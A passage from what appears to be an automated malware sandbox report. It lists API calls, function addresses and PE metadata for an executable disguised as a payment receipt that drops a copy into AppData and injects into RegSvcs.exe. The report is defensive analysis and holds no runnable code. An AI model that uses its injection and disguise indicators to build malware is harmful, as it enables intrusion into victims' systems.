                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122DB0 NtEnumerateKey,9_2_01122DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122DD0 NtDelayExecution,9_2_01122DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122C00 NtQueryInformationProcess,9_2_01122C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122C60 NtCreateKey,9_2_01122C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122CA0 NtQueryInformationToken,9_2_01122CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122CC0 NtQueryVirtualMemory,9_2_01122CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122CF0 NtOpenProcess,9_2_01122CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122F30 NtCreateSection,9_2_01122F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122F60 NtCreateProcessEx,9_2_01122F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122F90 NtProtectVirtualMemory,9_2_01122F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122FB0 NtResumeThread,9_2_01122FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122FA0 NtQuerySection,9_2_01122FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122FE0 NtCreateFile,9_2_01122FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122E30 NtWriteVirtualMemory,9_2_01122E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122E80 NtReadVirtualMemory,9_2_01122E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122EA0 NtAdjustPrivilegesToken,9_2_01122EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122EE0 NtQueueApcThread,9_2_01122EE0
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeCode function: 0_2_02B442100_2_02B44210
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeCode function: 0_2_02B46F900_2_02B46F90
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeCode function: 0_2_02B4DE740_2_02B4DE74
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeCode function: 0_2_072960400_2_07296040
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeCode function: 0_2_072970300_2_07297030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004188E39_2_004188E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004100B39_2_004100B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004011B09_2_004011B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E2CA9_2_0040E2CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004102D39_2_004102D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E2D39_2_0040E2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00416AF09_2_00416AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00416AF39_2_00416AF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004022A09_2_004022A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402BA29_2_00402BA2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402BB09_2_00402BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040247C9_2_0040247C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E41F9_2_0040E41F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E4239_2_0040E423
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E4E89_2_0040E4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004024809_2_00402480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042EEF39_2_0042EEF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004027709_2_00402770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402FD09_2_00402FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118A1189_2_0118A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E01009_2_010E0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011781589_2_01178158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011BB16B9_2_011BB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0112516C9_2_0112516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DF1729_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B01AA9_2_011B01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FB1B09_2_010FB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A81CC9_2_011A81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F70C09_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119F0CC9_2_0119F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A70E99_2_011A70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AF0E09_2_011AF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A132D9_2_011A132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DD34C9_2_010DD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AA3529_2_011AA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0113739A9_2_0113739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B03E69_2_011B03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FE3F09_2_010FE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011902749_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F52A09_2_010F52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B2C09_2_0110B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011702C09_2_011702C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011912ED9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F05359_2_010F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A75719_2_011A7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B05919_2_011B0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118D5B09_2_0118D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AF43F9_2_011AF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A24469_2_011A2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E14609_2_010E1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119E4F69_2_0119E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011147509_2_01114750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F07709_2_010F0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AF7B09_2_011AF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EC7C09_2_010EC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A16CC9_2_011A16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110C6E09_2_0110C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B9509_2_0110B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F99509_2_010F9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011069629_2_01106962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F29A09_2_010F29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011BA9A69_2_011BA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D8009_2_0115D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F28409_2_010F2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FA8409_2_010FA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D68B89_2_010D68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E8F09_2_0111E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F38E09_2_010F38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AAB409_2_011AAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFB769_2_011AFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110FB809_2_0110FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A6BD79_2_011A6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01165BF09_2_01165BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0112DBF99_2_0112DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFA499_2_011AFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A7A469_2_011A7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01163A6C9_2_01163A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EEA809_2_010EEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01135AA09_2_01135AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118DAAC9_2_0118DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119DAC69_2_0119DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FAD009_2_010FAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A1D5A9_2_011A1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F3D409_2_010F3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A7D739_2_011A7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01108DBF9_2_01108DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110FDC09_2_0110FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EADE09_2_010EADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0C009_2_010F0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01169C329_2_01169C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190CB59_2_01190CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFCF29_2_011AFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E0CF29_2_010E0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFF099_2_011AFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01110F309_2_01110F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01132F289_2_01132F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01164F409_2_01164F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1F929_2_010F1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFFB19_2_011AFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116EFA09_2_0116EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E2FC89_2_010E2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FCFE09_2_010FCFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AEE269_2_011AEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0E599_2_010F0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01102E909_2_01102E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011ACE939_2_011ACE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F9EB09_2_010F9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AEEDB9_2_011AEEDB
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_02DA421010_2_02DA4210
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_02DA6F9010_2_02DA6F90
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_02DADE7410_2_02DADE74
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0730678810_2_07306788
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0730635010_2_07306350
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_073083D810_2_073083D8
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_073083CA10_2_073083CA
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0730B07E10_2_0730B07E
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07305F1110_2_07305F11
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07305F1810_2_07305F18
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07307EB810_2_07307EB8
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07307EC810_2_07307EC8
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07506F5010_2_07506F50
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07505F6010_2_07505F60
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0750EA4310_2_0750EA43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F010015_2_010F0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0114600015_2_01146000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011802C015_2_011802C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110053515_2_01100535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0112475015_2_01124750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110077015_2_01100770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010FC7C015_2_010FC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111C6E015_2_0111C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111696215_2_01116962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011029A015_2_011029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110A84015_2_0110A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110284015_2_01102840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113889015_2_01138890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010E68B815_2_010E68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0112E8F015_2_0112E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010FEA8015_2_010FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110AD0015_2_0110AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110ED7A15_2_0110ED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01118DBF15_2_01118DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01108DC015_2_01108DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010FADE015_2_010FADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01100C0015_2_01100C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F0CF215_2_010F0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01120F3015_2_01120F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01142F2815_2_01142F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01174F4015_2_01174F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0117EFA015_2_0117EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F2FC815_2_010F2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01100E5915_2_01100E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01112E9015_2_01112E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010EF17215_2_010EF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113516C15_2_0113516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110B1B015_2_0110B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010ED34C15_2_010ED34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011033F315_2_011033F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011052A015_2_011052A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111B2C015_2_0111B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111D2F015_2_0111D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F146015_2_010F1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110349715_2_01103497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011474E015_2_011474E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110B73015_2_0110B730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110995015_2_01109950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111B95015_2_0111B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110599015_2_01105990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116D80015_2_0116D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011038E015_2_011038E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111FB8015_2_0111FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01175BF015_2_01175BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113DBF915_2_0113DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01173A6C15_2_01173A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01103D4015_2_01103D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111FDC015_2_0111FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01179C3215_2_01179C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01119C2015_2_01119C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01101F9215_2_01101F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01109EB015_2_01109EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042EEF315_2_0042EEF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01125130 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01147E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0116EA12 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0116F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 010DB970 appears 268 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01137E54 appears 96 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0115EA12 appears 86 times
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: invalid certificate
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2128885963.0000000007260000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2105060021.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000000.2031141086.0000000000A44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedLtX.exe: vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2129691124.00000000072E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2121814935.0000000003D9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exeBinary or memory string: OriginalFilenamedLtX.exe: vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: fttQgpyzkkc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, GikDqR6g4UGrEltCUX.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, GikDqR6g4UGrEltCUX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
